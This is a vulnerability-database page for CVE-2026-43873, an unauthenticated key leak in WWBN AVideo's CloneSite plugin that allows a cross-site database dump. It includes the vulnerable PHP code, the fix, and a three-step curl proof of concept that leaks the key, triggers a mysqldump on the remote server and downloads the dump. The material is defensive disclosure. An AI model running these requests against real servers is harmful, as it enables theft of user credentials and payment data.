Vulnerability-Lookup

CVE-2026-43873 (GCVE-0-2026-43873)

Vulnerability from cvelistv5 – Published: 2026-05-11 20:31 – Updated: 2026-05-12 12:56

Title

WWBN AVideo: Unauthenticated Disclosure of CloneSite `myKey` via Error Echo in `cloneClient.json.php` Enables Cross-Site DB Dump of the Configured Clone Server

Summary

WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/CloneSite/cloneClient.json.php echoes the local CloneSite shared secret ($objClone->myKey, a constant md5($global['systemRootPath'] . $global['salt'])) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before die(). When the victim has CloneSite configured with a remote cloneSiteURL (standard federation/backup setup), the leaked myKey is exactly the credential that authenticates the victim to that remote server's cloneServer.json.php, allowing the attacker to impersonate the victim and trigger a full mysqldump of the remote's database to the remote's public videos/clones/ directory Commit e6566f56a28f4556b2a0a09d03717a719dcb49da contains an updated fix.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-209 - Generation of Error Message Containing Sensitive Information

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
https://github.com/WWBN/AVideo/commit/e6566f56a28…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
WWBN	AVideo	Affected: <= 29.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-43873",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-12T12:56:05.654210Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-12T12:56:09.474Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 29.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/CloneSite/cloneClient.json.php echoes the local CloneSite shared secret ($objClone-\u003emyKey, a constant md5($global[\u0027systemRootPath\u0027] . $global[\u0027salt\u0027])) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before die(). When the victim has CloneSite configured with a remote cloneSiteURL (standard federation/backup setup), the leaked myKey is exactly the credential that authenticates the victim to that remote server\u0027s cloneServer.json.php, allowing the attacker to impersonate the victim and trigger a full mysqldump of the remote\u0027s database to the remote\u0027s public videos/clones/ directory Commit e6566f56a28f4556b2a0a09d03717a719dcb49da contains an updated fix."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-209",
              "description": "CWE-209: Generation of Error Message Containing Sensitive Information",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-11T20:31:06.454Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da"
        }
      ],
      "source": {
        "advisory": "GHSA-qm9p-p5pw-jrx2",
        "discovery": "UNKNOWN"
      },
      "title": "WWBN AVideo: Unauthenticated Disclosure of CloneSite `myKey` via Error Echo in `cloneClient.json.php` Enables Cross-Site DB Dump of the Configured Clone Server"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-43873",
    "datePublished": "2026-05-11T20:31:06.454Z",
    "dateReserved": "2026-05-04T15:17:09.329Z",
    "dateUpdated": "2026-05-12T12:56:09.474Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-43873",
      "date": "2026-05-18",
      "epss": "0.00041",
      "percentile": "0.12323"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-43873\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-11T22:22:11.703\",\"lastModified\":\"2026-05-12T14:50:18.527\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/CloneSite/cloneClient.json.php echoes the local CloneSite shared secret ($objClone-\u003emyKey, a constant md5($global[\u0027systemRootPath\u0027] . $global[\u0027salt\u0027])) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before die(). When the victim has CloneSite configured with a remote cloneSiteURL (standard federation/backup setup), the leaked myKey is exactly the credential that authenticates the victim to that remote server\u0027s cloneServer.json.php, allowing the attacker to impersonate the victim and trigger a full mysqldump of the remote\u0027s database to the remote\u0027s public videos/clones/ directory Commit e6566f56a28f4556b2a0a09d03717a719dcb49da contains an updated fix.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-209\"}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"WWBN AVideo: Unauthenticated Disclosure of CloneSite `myKey` via Error Echo in `cloneClient.json.php` Enables Cross-Site DB Dump of the Configured Clone Server\", \"source\": {\"advisory\": \"GHSA-qm9p-p5pw-jrx2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 29.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da\", \"name\": \"https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 29.0, plugin/CloneSite/cloneClient.json.php echoes the local CloneSite shared secret ($objClone-\u003emyKey, a constant md5($global[\u0027systemRootPath\u0027] . $global[\u0027salt\u0027])) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before die(). When the victim has CloneSite configured with a remote cloneSiteURL (standard federation/backup setup), the leaked myKey is exactly the credential that authenticates the victim to that remote server\u0027s cloneServer.json.php, allowing the attacker to impersonate the victim and trigger a full mysqldump of the remote\u0027s database to the remote\u0027s public videos/clones/ directory Commit e6566f56a28f4556b2a0a09d03717a719dcb49da contains an updated fix.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-209\", \"description\": \"CWE-209: Generation of Error Message Containing Sensitive Information\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-11T20:31:06.454Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-43873\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-12T12:56:05.654210Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2026-05-12T12:56:00.254Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-43873\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-11T20:31:06.454Z\", \"dateReserved\": \"2026-05-04T15:17:09.329Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-11T20:31:06.454Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-QM9P-P5PW-JRX2

Vulnerability from github – Published: 2026-05-05 18:58 – Updated: 2026-05-13 14:19

Summary

AVideo: Unauthenticated Disclosure of CloneSite `myKey` via Error Echo in `cloneClient.json.php` Enables Cross-Site DB Dump of the Configured Clone Server

Details

Summary

plugin/CloneSite/cloneClient.json.php echoes the local CloneSite shared secret ($objClone->myKey, a constant md5($global['systemRootPath'] . $global['salt'])) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before die(). When the victim has CloneSite configured with a remote cloneSiteURL (standard federation/backup setup), the leaked myKey is exactly the credential that authenticates the victim to that remote server's cloneServer.json.php, allowing the attacker to impersonate the victim and trigger a full mysqldump of the remote's database to the remote's public videos/clones/ directory.

Details

1. The leak (`plugin/CloneSite/cloneClient.json.php:51-60`)

$objCloneOriginal = $objClone;
$argv[1] = preg_replace("/[^A-Za-z0-9 ]/", '', empty($argv[1])?'':$argv[1]);

if (empty($objClone) || empty($argv[1]) || $objClone->myKey !== $argv[1]) {
    if (!User::isAdmin()) {
        $resp->msg = "You can't do this";
        $log->add("Clone: {$resp->msg}");
        echo "$objClone->myKey !== $argv[1]";   // <-- interpolates myKey
        die(json_encode($resp));
    }
}

Under PHP's web SAPI, the script-scope $argv global is not populated from the query string (only $_SERVER['argv'] is populated, and only when register_argc_argv=On). Verified on this host (PHP 8.4.16, built-in web server):

bool(false)                # isset($argv)
string(9) "undefined"      # $argv ?? 'undefined'
string(9) "undefined"      # $_SERVER['argv']
string(9) "undefined"      # $argv[1]
bool(true)                 # empty($argv[1])

Because empty($argv[1]) is true, line 51's preg_replace returns '' and $argv[1] becomes ''. Line 53 therefore enters the outer if (empty key). User::isAdmin() returns false for unauthenticated callers, so line 57 runs and echoes the contents of $objClone->myKey into the response body before die(). The response body looks like:

<32-hex-char md5> !== {"error":true,"msg":"You can't do this"}

The 32-hex prefix is the local myKey.

2. Where `myKey` comes from (`plugin/CloneSite/CloneSite.php:67`)

$obj->myKey = md5($global['systemRootPath'].$global['salt']);

myKey is a static per-installation value generated from systemRootPath and salt. It never rotates.

3. Why the leaked key is dangerous (cross-site chain)

cloneClient.json.php:75 shows myKey is the credential the client presents to its configured remote clone server:

$url = $objClone->cloneSiteURL . "plugin/CloneSite/cloneServer.json.php?url="
     . urlencode($global['webSiteRootURL']) . "&key={$objClone->myKey}&useRsync=" . intval($objClone->useRsync);

On the remote side, plugin/CloneSite/cloneServer.json.php:32-42 calls Clones::thisURLCanCloneMe($_GET['url'], $_GET['key']), which in plugin/CloneSite/Objects/Clones.php:73-101 does only:

$clone = new Clones(0);
$clone->loadFromURL($url);
...
if ($clone->getKey() !== $key) { $resp->msg = "Invalid Key"; return $resp; }
if ($clone->getStatus() !== 'a') { ... }

For any federation pair the remote admin has approved (status='a'), supplying url=<victim>&key=<leaked myKey> passes this check. cloneServer.json.php:86-90 then runs an unconditional mysqldump of every table except CachesInDB:

$cmd = "mysqldump -u {$mysqlUser} -p'{$mysqlPass}' --host {$mysqlHost} ".
       " --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} > $sqlFile";
exec($cmd . " 2>&1", $output, $return_val);
...
echo json_encode($resp);   // includes $resp->sqlFile = "Clone_mysqlDump_<uniqid>.sql"

The dump lands in {videosDir}/clones/<sqlFile>, and videos/ is a public static directory in default AVideo deployments, so the attacker can fetch it with one more unauthenticated request.

4. Not fixed by the previous `clones.json.php` hardening

Commit 160e02635/earlier added if (!User::isAdmin()) guards to plugin/CloneSite/clones.json.php (the table-management endpoint that lists server-side per-client keys, previously advisory-submitted as CWE-306). That fix does not apply to cloneClient.json.php, which is a separate file and discloses a structurally different secret (the local myKey, not the per-URL server-side keys).

PoC

Prerequisite: target installation has the CloneSite plugin enabled with a configured cloneSiteURL (this is the standard use: federated backup / site cloning). No authentication required.

Step 1 — leak the local myKey (unauthenticated GET):

curl -s 'https://victim.example.com/plugin/CloneSite/cloneClient.json.php'

Response body:

3f2a7c8b9d6e4f1a0b5c7d8e9f2a3b4c !== {"error":true,"msg":"You can't do this"}

The 32-hex-character prefix is $objClone->myKey.

Step 2 — use the leaked myKey to make the victim's configured remote dump its own database:

curl -s 'https://remote-server.example.com/plugin/CloneSite/cloneServer.json.php?url=https%3A%2F%2Fvictim.example.com%2F&key=3f2a7c8b9d6e4f1a0b5c7d8e9f2a3b4c&useRsync=0'

Response (truncated):

{"error":false,"url":"https://victim.example.com/","key":"...","videosDir":"...","sqlFile":"Clone_mysqlDump_65f3a2b14c7e8.sql","videoFiles":[...],"photoFiles":[...]}

Step 3 — download the full database dump from the remote's public videos/ directory:

curl -O 'https://remote-server.example.com/videos/clones/Clone_mysqlDump_65f3a2b14c7e8.sql'

This file contains every table except CachesInDB — users (including password hashes), payment records, API secrets, plugin configuration, etc.

Impact

Any unauthenticated attacker can retrieve the CloneSite shared secret (myKey) of any AVideo installation that has the plugin enabled. myKey is static and never rotates on its own.
When that installation is federated with a remote CloneSite server (the standard use of the plugin), the leaked key permits the attacker to impersonate the victim client to the remote. cloneServer.json.php on the remote performs no additional authentication, runs an unconditional mysqldump, and places the result under the web-accessible videos/clones/ directory — so a single leaked myKey leads to a full database dump (users, password hashes, payment and plugin configuration, API credentials) of the remote partner, downloadable over HTTP.
The compromise crosses the federation boundary: leaking the key on site A yields the database of site B. This is scope-changing in practice even if CVSS scope is formally Unchanged.
The clones.json.php hardening (the previously reported CWE-306 fix) does not cover this path; cloneClient.json.php is a distinct file that exposes a structurally different credential.

Recommended Fix

Do not echo the expected key in the rejection message, and reject non-CLI / non-admin callers cleanly. Example patch for plugin/CloneSite/cloneClient.json.php:51-60:

// Only accept the key argument from actual CLI invocations (intended usage:
// cron "php .../cloneClient.json.php <myKey>"). Over HTTP, require admin.
$cliKey = (PHP_SAPI === 'cli' && !empty($argv[1]))
    ? preg_replace("/[^A-Za-z0-9 ]/", '', $argv[1])
    : '';

if (empty($objClone) || empty($cliKey) || $objClone->myKey !== $cliKey) {
    if (!User::isAdmin()) {
        $resp->msg = "You can't do this";
        $log->add("Clone: {$resp->msg}");
        // Do NOT echo $objClone->myKey — it is a shared secret used to
        // authenticate to the configured remote clone server.
        die(json_encode($resp));
    }
}

Additional hardening recommended:

Replace the static myKey = md5(systemRootPath . salt) with a randomly generated, per-installation key stored in the plugin configuration that can be rotated (see similar advice from GHSA-wqcc-qf63-c2x4 / CWE-331 on AVideo secret generation).
On the remote side (cloneServer.json.php), consider requiring the sqlFile path to be unguessable (already is, via uniqid()) AND gating the dump behind an IP allowlist or an additional pre-shared rotating token, so that loss of a client's myKey does not immediately yield a full database dump.
Serve videos/clones/ with an .htaccess/nginx rule that denies direct HTTP access, so that even if a rogue client is authenticated, the dump is not downloadable over the web.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43873"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-209"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T18:58:13Z",
    "nvd_published_at": "2026-05-11T22:22:11Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`plugin/CloneSite/cloneClient.json.php` echoes the local CloneSite shared secret (`$objClone-\u003emyKey`, a constant `md5($global[\u0027systemRootPath\u0027] . $global[\u0027salt\u0027])`) into the HTTP response body on every unauthenticated request. The unauthenticated error branch was intended to reject non-admin callers without a valid key, but the rejection message interpolates the expected key before `die()`. When the victim has CloneSite configured with a remote `cloneSiteURL` (standard federation/backup setup), the leaked `myKey` is exactly the credential that authenticates the victim to that remote server\u0027s `cloneServer.json.php`, allowing the attacker to impersonate the victim and trigger a full `mysqldump` of the remote\u0027s database to the remote\u0027s public `videos/clones/` directory.\n\n## Details\n\n### 1. The leak (`plugin/CloneSite/cloneClient.json.php:51-60`)\n\n```php\n$objCloneOriginal = $objClone;\n$argv[1] = preg_replace(\"/[^A-Za-z0-9 ]/\", \u0027\u0027, empty($argv[1])?\u0027\u0027:$argv[1]);\n\nif (empty($objClone) || empty($argv[1]) || $objClone-\u003emyKey !== $argv[1]) {\n    if (!User::isAdmin()) {\n        $resp-\u003emsg = \"You can\u0027t do this\";\n        $log-\u003eadd(\"Clone: {$resp-\u003emsg}\");\n        echo \"$objClone-\u003emyKey !== $argv[1]\";   // \u003c-- interpolates myKey\n        die(json_encode($resp));\n    }\n}\n```\n\nUnder PHP\u0027s web SAPI, the script-scope `$argv` global is not populated from the query string (only `$_SERVER[\u0027argv\u0027]` is populated, and only when `register_argc_argv=On`). Verified on this host (PHP 8.4.16, built-in web server):\n\n```\nbool(false)                # isset($argv)\nstring(9) \"undefined\"      # $argv ?? \u0027undefined\u0027\nstring(9) \"undefined\"      # $_SERVER[\u0027argv\u0027]\nstring(9) \"undefined\"      # $argv[1]\nbool(true)                 # empty($argv[1])\n```\n\nBecause `empty($argv[1])` is true, line 51\u0027s `preg_replace` returns `\u0027\u0027` and `$argv[1]` becomes `\u0027\u0027`. Line 53 therefore enters the outer `if` (empty key). `User::isAdmin()` returns false for unauthenticated callers, so line 57 runs and echoes the contents of `$objClone-\u003emyKey` into the response body before `die()`. The response body looks like:\n\n```\n\u003c32-hex-char md5\u003e !== {\"error\":true,\"msg\":\"You can\u0027t do this\"}\n```\n\nThe 32-hex prefix is the local `myKey`.\n\n### 2. Where `myKey` comes from (`plugin/CloneSite/CloneSite.php:67`)\n\n```php\n$obj-\u003emyKey = md5($global[\u0027systemRootPath\u0027].$global[\u0027salt\u0027]);\n```\n\n`myKey` is a static per-installation value generated from `systemRootPath` and `salt`. It never rotates.\n\n### 3. Why the leaked key is dangerous (cross-site chain)\n\n`cloneClient.json.php:75` shows `myKey` is the credential the client presents to its configured remote clone server:\n\n```php\n$url = $objClone-\u003ecloneSiteURL . \"plugin/CloneSite/cloneServer.json.php?url=\"\n     . urlencode($global[\u0027webSiteRootURL\u0027]) . \"\u0026key={$objClone-\u003emyKey}\u0026useRsync=\" . intval($objClone-\u003euseRsync);\n```\n\nOn the remote side, `plugin/CloneSite/cloneServer.json.php:32-42` calls `Clones::thisURLCanCloneMe($_GET[\u0027url\u0027], $_GET[\u0027key\u0027])`, which in `plugin/CloneSite/Objects/Clones.php:73-101` does only:\n\n```php\n$clone = new Clones(0);\n$clone-\u003eloadFromURL($url);\n...\nif ($clone-\u003egetKey() !== $key) { $resp-\u003emsg = \"Invalid Key\"; return $resp; }\nif ($clone-\u003egetStatus() !== \u0027a\u0027) { ... }\n```\n\nFor any federation pair the remote admin has approved (`status=\u0027a\u0027`), supplying `url=\u003cvictim\u003e\u0026key=\u003cleaked myKey\u003e` passes this check. `cloneServer.json.php:86-90` then runs an unconditional `mysqldump` of every table except `CachesInDB`:\n\n```php\n$cmd = \"mysqldump -u {$mysqlUser} -p\u0027{$mysqlPass}\u0027 --host {$mysqlHost} \".\n       \" --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} \u003e $sqlFile\";\nexec($cmd . \" 2\u003e\u00261\", $output, $return_val);\n...\necho json_encode($resp);   // includes $resp-\u003esqlFile = \"Clone_mysqlDump_\u003cuniqid\u003e.sql\"\n```\n\nThe dump lands in `{videosDir}/clones/\u003csqlFile\u003e`, and `videos/` is a public static directory in default AVideo deployments, so the attacker can fetch it with one more unauthenticated request.\n\n### 4. Not fixed by the previous `clones.json.php` hardening\n\nCommit `160e02635`/earlier added `if (!User::isAdmin())` guards to `plugin/CloneSite/clones.json.php` (the table-management endpoint that lists server-side per-client keys, previously advisory-submitted as CWE-306). That fix does not apply to `cloneClient.json.php`, which is a separate file and discloses a structurally different secret (the local `myKey`, not the per-URL server-side keys).\n\n## PoC\n\nPrerequisite: target installation has the `CloneSite` plugin enabled with a configured `cloneSiteURL` (this is the standard use: federated backup / site cloning). No authentication required.\n\n**Step 1 \u2014 leak the local `myKey` (unauthenticated GET):**\n\n```bash\ncurl -s \u0027https://victim.example.com/plugin/CloneSite/cloneClient.json.php\u0027\n```\n\nResponse body:\n\n```\n3f2a7c8b9d6e4f1a0b5c7d8e9f2a3b4c !== {\"error\":true,\"msg\":\"You can\u0027t do this\"}\n```\n\nThe 32-hex-character prefix is `$objClone-\u003emyKey`.\n\n**Step 2 \u2014 use the leaked `myKey` to make the victim\u0027s configured remote dump its own database:**\n\n```bash\ncurl -s \u0027https://remote-server.example.com/plugin/CloneSite/cloneServer.json.php?url=https%3A%2F%2Fvictim.example.com%2F\u0026key=3f2a7c8b9d6e4f1a0b5c7d8e9f2a3b4c\u0026useRsync=0\u0027\n```\n\nResponse (truncated):\n\n```json\n{\"error\":false,\"url\":\"https://victim.example.com/\",\"key\":\"...\",\"videosDir\":\"...\",\"sqlFile\":\"Clone_mysqlDump_65f3a2b14c7e8.sql\",\"videoFiles\":[...],\"photoFiles\":[...]}\n```\n\n**Step 3 \u2014 download the full database dump from the remote\u0027s public `videos/` directory:**\n\n```bash\ncurl -O \u0027https://remote-server.example.com/videos/clones/Clone_mysqlDump_65f3a2b14c7e8.sql\u0027\n```\n\nThis file contains every table except `CachesInDB` \u2014 `users` (including password hashes), payment records, API secrets, plugin configuration, etc.\n\n## Impact\n\n- Any unauthenticated attacker can retrieve the CloneSite shared secret (`myKey`) of any AVideo installation that has the plugin enabled. `myKey` is static and never rotates on its own.\n- When that installation is federated with a remote CloneSite server (the standard use of the plugin), the leaked key permits the attacker to impersonate the victim client to the remote. `cloneServer.json.php` on the remote performs no additional authentication, runs an unconditional `mysqldump`, and places the result under the web-accessible `videos/clones/` directory \u2014 so a single leaked `myKey` leads to a full database dump (users, password hashes, payment and plugin configuration, API credentials) of the remote partner, downloadable over HTTP.\n- The compromise crosses the federation boundary: leaking the key on site A yields the database of site B. This is scope-changing in practice even if CVSS scope is formally `Unchanged`.\n- The `clones.json.php` hardening (the previously reported CWE-306 fix) does not cover this path; `cloneClient.json.php` is a distinct file that exposes a structurally different credential.\n\n## Recommended Fix\n\nDo not echo the expected key in the rejection message, and reject non-CLI / non-admin callers cleanly. Example patch for `plugin/CloneSite/cloneClient.json.php:51-60`:\n\n```php\n// Only accept the key argument from actual CLI invocations (intended usage:\n// cron \"php .../cloneClient.json.php \u003cmyKey\u003e\"). Over HTTP, require admin.\n$cliKey = (PHP_SAPI === \u0027cli\u0027 \u0026\u0026 !empty($argv[1]))\n    ? preg_replace(\"/[^A-Za-z0-9 ]/\", \u0027\u0027, $argv[1])\n    : \u0027\u0027;\n\nif (empty($objClone) || empty($cliKey) || $objClone-\u003emyKey !== $cliKey) {\n    if (!User::isAdmin()) {\n        $resp-\u003emsg = \"You can\u0027t do this\";\n        $log-\u003eadd(\"Clone: {$resp-\u003emsg}\");\n        // Do NOT echo $objClone-\u003emyKey \u2014 it is a shared secret used to\n        // authenticate to the configured remote clone server.\n        die(json_encode($resp));\n    }\n}\n```\n\nAdditional hardening recommended:\n\n- Replace the static `myKey = md5(systemRootPath . salt)` with a randomly generated, per-installation key stored in the plugin configuration that can be rotated (see similar advice from GHSA-wqcc-qf63-c2x4 / CWE-331 on AVideo secret generation).\n- On the remote side (`cloneServer.json.php`), consider requiring the `sqlFile` path to be unguessable (already is, via `uniqid()`) AND gating the dump behind an IP allowlist or an additional pre-shared rotating token, so that loss of a client\u0027s `myKey` does not immediately yield a full database dump.\n- Serve `videos/clones/` with an `.htaccess`/nginx rule that denies direct HTTP access, so that even if a rogue client is authenticated, the dump is not downloadable over the web.",
  "id": "GHSA-qm9p-p5pw-jrx2",
  "modified": "2026-05-13T14:19:24Z",
  "published": "2026-05-05T18:58:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43873"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Unauthenticated Disclosure of CloneSite `myKey` via Error Echo in `cloneClient.json.php` Enables Cross-Site DB Dump of the Configured Clone Server"
}

FKIE_CVE-2026-43873

Vulnerability from fkie_nvd - Published: 2026-05-11 22:22 - Updated: 2026-05-12 14:50

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/e6566f56a28f4556b2a0a09d03717a719dcb49da
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-qm9p-p5pw-jrx2

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
